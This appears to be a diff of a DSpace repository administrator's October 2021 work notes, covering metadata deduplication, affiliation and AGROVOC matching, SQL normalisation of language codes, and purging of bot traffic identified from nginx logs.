                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -$ csvcut -c 1 /tmp/2021-10-01-affiliations.csv | sed 1d > /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -ations-matching.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -1879
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -$ wc -l /tmp/2021-10-01-affiliations.txt 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -7100 /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                localhost/dspace63= > \COPY (SELECT DISTINCT text_value as "cg.contributor.affiliation", count(*) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id = 211 GROUP BY text_value ORDER BY count DESC) to /tmp/2021-10-01-affiliations.csv WITH CSV HEADER;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +$ csvcut -c 1 /tmp/2021-10-01-affiliations.csv | sed 1d > /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +$ ./ilri/ror-lookup.py -i /tmp/2021-10-01-affiliations.txt -r 2021-09-23-ror-data.json -o /tmp/2021-10-01-affili
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +ations-matching.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +$ csvgrep -c matched -m true /tmp/2021-10-01-affiliations-matching.csv | sed 1d | wc -l 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +1879
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +$ wc -l /tmp/2021-10-01-affiliations.txt 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +7100 /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • So we have 1879/7100 (26.46%) matching already

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2021-10-03

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                @@ -185,37 +185,37 @@ $ wc -l /tmp/2021-10-01-affiliations.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            # zcat --force /var/log/nginx/*.log* | grep 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' | awk '{print $1}' | sort | uniq > /tmp/mozilla-4.0-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -# wc -l /tmp/mozilla-4.0-ips.txt 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -543 /tmp/mozilla-4.0-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              # zcat --force /var/log/nginx/*.log* | grep 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' | awk '{print $1}' | sort | uniq > /tmp/mozilla-4.0-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +# wc -l /tmp/mozilla-4.0-ips.txt 
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +543 /tmp/mozilla-4.0-ips.txt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • Then I resolved the IPs and extracted the ones belonging to Amazon:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              $ ./ilri/resolve-addresses-geoip2.py -i /tmp/mozilla-4.0-ips.txt -k "$ABUSEIPDB_API_KEY" -o /tmp/mozilla-4.0-ips.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -$ csvgrep -c asn -m 14618 /tmp/mozilla-4.0-ips.csv | csvcut -c ip | sed 1d | tee /tmp/amazon-ips.txt | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $ ./ilri/resolve-addresses-geoip2.py -i /tmp/mozilla-4.0-ips.txt -k "$ABUSEIPDB_API_KEY" -o /tmp/mozilla-4.0-ips.csv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +$ csvgrep -c asn -m 14618 /tmp/mozilla-4.0-ips.csv | csvcut -c ip | sed 1d | tee /tmp/amazon-ips.txt | wc -l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • I am thinking I will purge them all, as I have several indicators that they are bots: mysterious user agent, IP owned by Amazon
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Even more interesting, these requests are weighted VERY heavily on the CGIAR System community:
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   1592 GET /handle/10947/2526
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -   1592 GET /handle/10947/2527
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -   1592 GET /handle/10947/34
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -   1593 GET /handle/10947/6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -   1594 GET /handle/10947/1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -   1598 GET /handle/10947/2515
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -   1598 GET /handle/10947/2516
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -   1599 GET /handle/10568/101335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -   1599 GET /handle/10568/91688
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -   1599 GET /handle/10947/2517
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -   1599 GET /handle/10947/2518
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -   1599 GET /handle/10947/2519
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -   1599 GET /handle/10947/2708
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -   1599 GET /handle/10947/2871
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -   1600 GET /handle/10568/89342
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -   1600 GET /handle/10947/4467
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -   1607 GET /handle/10568/103816
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                - 290382 GET /handle/10568/83389
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     1592 GET /handle/10947/2526
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +   1592 GET /handle/10947/2527
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +   1592 GET /handle/10947/34
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +   1593 GET /handle/10947/6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +   1594 GET /handle/10947/1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +   1598 GET /handle/10947/2515
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +   1598 GET /handle/10947/2516
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +   1599 GET /handle/10568/101335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +   1599 GET /handle/10568/91688
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +   1599 GET /handle/10947/2517
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +   1599 GET /handle/10947/2518
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +   1599 GET /handle/10947/2519
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +   1599 GET /handle/10947/2708
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +   1599 GET /handle/10947/2871
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +   1600 GET /handle/10568/89342
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +   1600 GET /handle/10947/4467
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +   1607 GET /handle/10568/103816
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  + 290382 GET /handle/10568/83389
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Before I purge all those I will ask someone Samuel Stacey from the System Office to hopefully get an insight…
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Meeting with Michael Victor, Peter, Jane, and Abenet about the future of repositories in the One CGIAR
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Meeting with Michelle from Altmetric about their new CSV upload system @@ -231,10 +231,10 @@ $ csvgrep -c asn -m 14618 /tmp/mozilla-4.0-ip
                                                                                                                                                                                                                                                                                  • Extract the AGROVOC subjects from IWMI’s 292 publications to validate them against AGROVOC:
                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                  $ csvcut -c 'dcterms.subject[en_US]' ~/Downloads/2021-10-03-non-IWMI-publications.csv | sed -e 1d -e 's/||/\n/g' -e 's/"//g' | sort -u > /tmp/agrovoc.txt
                                                                                                                                                                                                                                                                                  -$ ./ilri/agrovoc-lookup.py -i /tmp/agrovoc-sorted.txt -o /tmp/agrovoc-matches.csv
                                                                                                                                                                                                                                                                                  -$ csvgrep -c 'number of matches' -m '0' /tmp/agrovoc-matches.csv | csvcut -c 1 > /tmp/invalid-agrovoc.csv
                                                                                                                                                                                                                                                                                  -

                                                                                                                                                                                                                                                                                  2021-10-05

                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                  $ csvcut -c 'dcterms.subject[en_US]' ~/Downloads/2021-10-03-non-IWMI-publications.csv | sed -e 1d -e 's/||/\n/g' -e 's/"//g' | sort -u > /tmp/agrovoc.txt
                                                                                                                                                                                                                                                                                  +$ ./ilri/agrovoc-lookup.py -i /tmp/agrovoc-sorted.txt -o /tmp/agrovoc-matches.csv
                                                                                                                                                                                                                                                                                  +$ csvgrep -c 'number of matches' -m '0' /tmp/agrovoc-matches.csv | csvcut -c 1 > /tmp/invalid-agrovoc.csv
                                                                                                                                                                                                                                                                                  +

                                                                                                                                                                                                                                                                                  2021-10-05

                                                                                                                                                                                                                                                                                  • Sam put me in touch with Dodi from the System Office web team and he confirmed that the Amazon requests are not theirs
                                                                                                                                                                                                                                                                                      @@ -243,11 +243,11 @@ $ csvgrep -c 'number of matches' -m <
                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                  $ ./ilri/check-spider-ip-hits.sh -f /tmp/robot-ips.txt -p
                                                                                                                                                                                                                                                                                  -...
                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                  -Total number of bot hits purged: 465119
                                                                                                                                                                                                                                                                                  -

                                                                                                                                                                                                                                                                                  2021-10-06

                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                  $ ./ilri/check-spider-ip-hits.sh -f /tmp/robot-ips.txt -p
                                                                                                                                                                                                                                                                                  +...
                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                  +Total number of bot hits purged: 465119
                                                                                                                                                                                                                                                                                  +

                                                                                                                                                                                                                                                                                  2021-10-06

                                                                                                                                                                                                                                                                                  • Thinking about how we could check for duplicates before importing
                                                                                                                                                                                                                                                                                      @@ -255,14 +255,14 @@ $ csvgrep -c 'number of matches' -m <
                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                  localhost/dspace63= > CREATE EXTENSION pg_trgm;
                                                                                                                                                                                                                                                                                  -localhost/dspace63= > SELECT metadata_value_id, text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND SIMILARITY(text_value,'Molecular marker based genetic diversity assessment of Striga resistant maize inbred lines') > 0.5;
                                                                                                                                                                                                                                                                                  - metadata_value_id │                                         text_value                                         │           dspace_object_id
                                                                                                                                                                                                                                                                                  -───────────────────┼────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
                                                                                                                                                                                                                                                                                  -           3652624 │ Molecular marker based genetic diversity assessment of Striga resistant maize inbred lines │ b7f0bf12-b183-4b2f-bbd2-7a5697b0c467
                                                                                                                                                                                                                                                                                  -           3677663 │ Molecular marker based genetic diversity assessment of Striga resistant maize inbred lines │ fb62f551-f4a5-4407-8cdc-6bff6dac399e
                                                                                                                                                                                                                                                                                  -(2 rows)
                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                    localhost/dspace63= > CREATE EXTENSION pg_trgm;
                                                                                                                                                                                                                                                                                    +localhost/dspace63= > SELECT metadata_value_id, text_value, dspace_object_id FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=64 AND SIMILARITY(text_value,'Molecular marker based genetic diversity assessment of Striga resistant maize inbred lines') > 0.5;
                                                                                                                                                                                                                                                                                    + metadata_value_id │                                         text_value                                         │           dspace_object_id
                                                                                                                                                                                                                                                                                    +───────────────────┼────────────────────────────────────────────────────────────────────────────────────────────┼──────────────────────────────────────
                                                                                                                                                                                                                                                                                    +           3652624 │ Molecular marker based genetic diversity assessment of Striga resistant maize inbred lines │ b7f0bf12-b183-4b2f-bbd2-7a5697b0c467
                                                                                                                                                                                                                                                                                    +           3677663 │ Molecular marker based genetic diversity assessment of Striga resistant maize inbred lines │ fb62f551-f4a5-4407-8cdc-6bff6dac399e
                                                                                                                                                                                                                                                                                    +(2 rows)
                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                    • I was able to find an exact duplicate for an IITA item by searching for its title (I already knew that these existed)
                                                                                                                                                                                                                                                                                    • I started working on a basic Python script to do this and managed to find an actual duplicate in the recent IWMI items
                                                                                                                                                                                                                                                                                        @@ -291,10 +291,10 @@ localhost/dspace63= > SELECT metadata_value_id, text_value, dspace_object_id
                                                                                                                                                                                                                                                                                      • Then I ran this new version of csv-metadata-quality on an export of IWMI’s community, minus some fields I don’t want to check:
                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                      $ csvcut -C 'dc.date.accessioned,dc.date.accessioned[],dc.date.accessioned[en_US],dc.date.available,dc.date.available[],dc.date.available[en_US],dcterms.issued[en_US],dcterms.issued[],dcterms.issued,dc.description.provenance[en],dc.description.provenance[en_US],dc.identifier.uri,dc.identifier.uri[],dc.identifier.uri[en_US],dcterms.abstract[en_US],dcterms.bibliographicCitation[en_US],collection' ~/Downloads/iwmi.csv > /tmp/iwmi-to-check.csv
                                                                                                                                                                                                                                                                                      -$ csv-metadata-quality -i /tmp/iwmi-to-check.csv -o /tmp/iwmi.csv | tee /tmp/out.log
                                                                                                                                                                                                                                                                                      -$ xsv split -s 2000 /tmp /tmp/iwmi.csv
                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                        $ csvcut -C 'dc.date.accessioned,dc.date.accessioned[],dc.date.accessioned[en_US],dc.date.available,dc.date.available[],dc.date.available[en_US],dcterms.issued[en_US],dcterms.issued[],dcterms.issued,dc.description.provenance[en],dc.description.provenance[en_US],dc.identifier.uri,dc.identifier.uri[],dc.identifier.uri[en_US],dcterms.abstract[en_US],dcterms.bibliographicCitation[en_US],collection' ~/Downloads/iwmi.csv > /tmp/iwmi-to-check.csv
                                                                                                                                                                                                                                                                                        +$ csv-metadata-quality -i /tmp/iwmi-to-check.csv -o /tmp/iwmi.csv | tee /tmp/out.log
                                                                                                                                                                                                                                                                                        +$ xsv split -s 2000 /tmp /tmp/iwmi.csv
                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                        • I noticed each CSV only had 10 or 20 corrections, mostly that none of the duplicate metadata values were removed in the CSVs…
                                                                                                                                                                                                                                                                                          • I cut a subset of the fields from the main CSV and tried again, but DSpace said “no changes detected”
                                                                                                                                                                                                                                                                                          • @@ -319,54 +319,54 @@ Try doing it in two imports. In first import, remove all authors. In second impo
                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                        $ csvcut -c 'id,cg.contributor.affiliation[en_US],cg.coverage.country[en_US],cg.coverage.iso3166-alpha2[en_US],cg.coverage.subregion[en_US],cg.identifier.doi[en_US],cg.identifier.iwmilibrary[en_US],cg.identifier.url[en_US],cg.isijournal[en_US],cg.issn[en_US],cg.river.basin[en_US],dc.contributor.author[en_US],dcterms.subject[en_US]' ~/Downloads/iwmi.csv > /tmp/iwmi-duplicate-metadata.csv
                                                                                                                                                                                                                                                                                        -# Copy and blank columns in OpenRefine
                                                                                                                                                                                                                                                                                        -$ csv-metadata-quality -i ~/Downloads/2021-10-07-IWMI-duplicate-metadata-csv.csv -o /tmp/iwmi-duplicates-cleaned.csv | tee /tmp/out.log
                                                                                                                                                                                                                                                                                        -$ xsv split -s 2000 /tmp /tmp/iwmi-duplicates-cleaned.csv
                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                          $ csvcut -c 'id,cg.contributor.affiliation[en_US],cg.coverage.country[en_US],cg.coverage.iso3166-alpha2[en_US],cg.coverage.subregion[en_US],cg.identifier.doi[en_US],cg.identifier.iwmilibrary[en_US],cg.identifier.url[en_US],cg.isijournal[en_US],cg.issn[en_US],cg.river.basin[en_US],dc.contributor.author[en_US],dcterms.subject[en_US]' ~/Downloads/iwmi.csv > /tmp/iwmi-duplicate-metadata.csv
                                                                                                                                                                                                                                                                                          +# Copy and blank columns in OpenRefine
                                                                                                                                                                                                                                                                                          +$ csv-metadata-quality -i ~/Downloads/2021-10-07-IWMI-duplicate-metadata-csv.csv -o /tmp/iwmi-duplicates-cleaned.csv | tee /tmp/out.log
                                                                                                                                                                                                                                                                                          +$ xsv split -s 2000 /tmp /tmp/iwmi-duplicates-cleaned.csv
                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                          • It takes a few hours per 2,000 items because DSpace processes them so slowly… sigh…

                                                                                                                                                                                                                                                                                          2021-10-08

                                                                                                                                                                                                                                                                                          • I decided to update these records in PostgreSQL instead of via several CSV batches, as there were several others to normalize too:
                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                          cgspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
                                                                                                                                                                                                                                                                                          - text_lang |  count  
                                                                                                                                                                                                                                                                                          ------------+---------
                                                                                                                                                                                                                                                                                          - en_US     | 2603711
                                                                                                                                                                                                                                                                                          - en_Fu     |  115568
                                                                                                                                                                                                                                                                                          - en        |    8818
                                                                                                                                                                                                                                                                                          -           |    5286
                                                                                                                                                                                                                                                                                          - fr        |       2
                                                                                                                                                                                                                                                                                          - vn        |       2
                                                                                                                                                                                                                                                                                          -           |       0
                                                                                                                                                                                                                                                                                          -(7 rows)
                                                                                                                                                                                                                                                                                          -cgspace=# BEGIN;
                                                                                                                                                                                                                                                                                          -cgspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('en_Fu', 'en', '');
                                                                                                                                                                                                                                                                                          -UPDATE 129673
                                                                                                                                                                                                                                                                                          -cgspace=# COMMIT;
                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                            cgspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
                                                                                                                                                                                                                                                                                            + text_lang |  count  
                                                                                                                                                                                                                                                                                            +-----------+---------
                                                                                                                                                                                                                                                                                            + en_US     | 2603711
                                                                                                                                                                                                                                                                                            + en_Fu     |  115568
                                                                                                                                                                                                                                                                                            + en        |    8818
                                                                                                                                                                                                                                                                                            +           |    5286
                                                                                                                                                                                                                                                                                            + fr        |       2
                                                                                                                                                                                                                                                                                            + vn        |       2
                                                                                                                                                                                                                                                                                            +           |       0
                                                                                                                                                                                                                                                                                            +(7 rows)
                                                                                                                                                                                                                                                                                            +cgspace=# BEGIN;
                                                                                                                                                                                                                                                                                            +cgspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE dspace_object_id IN (SELECT uuid FROM item) AND text_lang IN ('en_Fu', 'en', '');
                                                                                                                                                                                                                                                                                            +UPDATE 129673
                                                                                                                                                                                                                                                                                            +cgspace=# COMMIT;
                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                            • So all this effort to remove ~400 duplicate metadata values in the IWMI community hmmm:
                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                            $ grep -c 'Removing duplicate value' /tmp/out.log
                                                                                                                                                                                                                                                                                            -391
                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                              $ grep -c 'Removing duplicate value' /tmp/out.log
                                                                                                                                                                                                                                                                                              +391
                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                              • I tried to export ILRI’s community, but ran into the export bug (DS-4211)
                                                                                                                                                                                                                                                                                                • After applying the patch on my local instance I was able to export, but found many duplicate items in the CSV (as I also noticed in 2021-02):
                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                              $ csvcut -c id /tmp/ilri-duplicate-metadata.csv | sed '1d' | wc -l 
                                                                                                                                                                                                                                                                                              -32070
                                                                                                                                                                                                                                                                                              -$ csvcut -c id /tmp/ilri-duplicate-metadata.csv | sort -u | sed '1d' | wc -l
                                                                                                                                                                                                                                                                                              -19315
                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                $ csvcut -c id /tmp/ilri-duplicate-metadata.csv | sed '1d' | wc -l 
                                                                                                                                                                                                                                                                                                +32070
                                                                                                                                                                                                                                                                                                +$ csvcut -c id /tmp/ilri-duplicate-metadata.csv | sort -u | sed '1d' | wc -l
                                                                                                                                                                                                                                                                                                +19315
                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                • It seems there are only about 200 duplicate values in this subset of fields in ILRI’s community:
                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                $ grep -c 'Removing duplicate value' /tmp/out.log
                                                                                                                                                                                                                                                                                                -220
                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                  $ grep -c 'Removing duplicate value' /tmp/out.log
                                                                                                                                                                                                                                                                                                  +220
                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                  • I found a cool way to select only the items with corrections
                                                                                                                                                                                                                                                                                                    • First, extract a handful of fields from the CSV with csvcut
                                                                                                                                                                                                                                                                                                    • @@ -376,14 +376,14 @@ $ csvcut -c id /tmp/ilri-duplicate-metadata.csv | sort -u | sed
                                                                                                                                                                                                                                                                                                      $ csvcut -c 'id,cg.contributor.affiliation[en_US],cg.coverage.country[en_US],cg.coverage.iso3166-alpha2[en_US],cg.coverage.subregion[en_US],cg.identifier.doi[en_US],cg.identifier.url[en_US],cg.isijournal[en_US],cg.issn[en_US],dc.contributor.author[en_US],dcterms.subject[en_US]' /tmp/ilri.csv | csvsort | uniq > /tmp/ilri-deduplicated-items.csv
                                                                                                                                                                                                                                                                                                      -$ csv-metadata-quality -i /tmp/ilri-deduplicated-items.csv -o /tmp/ilri-deduplicated-items-cleaned.csv | tee /tmp/out.log
                                                                                                                                                                                                                                                                                                      -$ sed -i -e '1s/en_US/en_Fu/g' /tmp/ilri-deduplicated-items-cleaned.csv
                                                                                                                                                                                                                                                                                                      -$ csvjoin -c id /tmp/ilri-deduplicated-items.csv /tmp/ilri-deduplicated-items-cleaned.csv > /tmp/ilri-deduplicated-items-cleaned-joined.csv
                                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                        $ csvcut -c 'id,cg.contributor.affiliation[en_US],cg.coverage.country[en_US],cg.coverage.iso3166-alpha2[en_US],cg.coverage.subregion[en_US],cg.identifier.doi[en_US],cg.identifier.url[en_US],cg.isijournal[en_US],cg.issn[en_US],dc.contributor.author[en_US],dcterms.subject[en_US]' /tmp/ilri.csv | csvsort | uniq > /tmp/ilri-deduplicated-items.csv
                                                                                                                                                                                                                                                                                                        +$ csv-metadata-quality -i /tmp/ilri-deduplicated-items.csv -o /tmp/ilri-deduplicated-items-cleaned.csv | tee /tmp/out.log
                                                                                                                                                                                                                                                                                                        +$ sed -i -e '1s/en_US/en_Fu/g' /tmp/ilri-deduplicated-items-cleaned.csv
                                                                                                                                                                                                                                                                                                        +$ csvjoin -c id /tmp/ilri-deduplicated-items.csv /tmp/ilri-deduplicated-items-cleaned.csv > /tmp/ilri-deduplicated-items-cleaned-joined.csv
                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                        • Then I imported the file into OpenRefine and used a custom text facet with a GREL like this to identify the rows with changes:
                                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                                        if(cells['dcterms.subject[en_US]'].value == cells['dcterms.subject[en_Fu]'].value,"same","different")
                                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                                        if(cells['dcterms.subject[en_US]'].value == cells['dcterms.subject[en_Fu]'].value,"same","different")
                                                                                                                                                                                                                                                                                                         
                                                                                                                                                                                                                                                                                                        • For these rows I starred them and then blanked out the original field so DSpace would see it as a removal, and add the new column
                                                                                                                                                                                                                                                                                                            @@ -392,9 +392,9 @@ $ csvjoin -c id /tmp/ilri-deduplicated-items.csv /tmp/ilri-deduplicated-items-cl
                                                                                                                                                                                                                                                                                                          • I did the same for CIAT but there were over 7,000 duplicate metadata values! Hard to believe:
                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                          $ grep -c 'Removing duplicate value' /tmp/out.log
                                                                                                                                                                                                                                                                                                          -7720
                                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                            $ grep -c 'Removing duplicate value' /tmp/out.log
                                                                                                                                                                                                                                                                                                            +7720
                                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                                            • I applied these to the CIAT community, so in total that’s over 8,000 duplicate metadata values removed in a handful of fields…

                                                                                                                                                                                                                                                                                                            2021-10-09

                                                                                                                                                                                                                                                                                                            @@ -402,14 +402,14 @@ $ csvjoin -c id /tmp/ilri-deduplicated-items.csv /tmp/ilri-deduplicated-items-cl
                                                                                                                                                                                                                                                                                                          • I did similar metadata cleanups for CCAFS and IITA too, but there were only a few hundred duplicates there
                                                                                                                                                                                                                                                                                                          • Also of note, there are some other fixes too, for example in IITA’s community:
                                                                                                                                                                                                                                                                                                          -
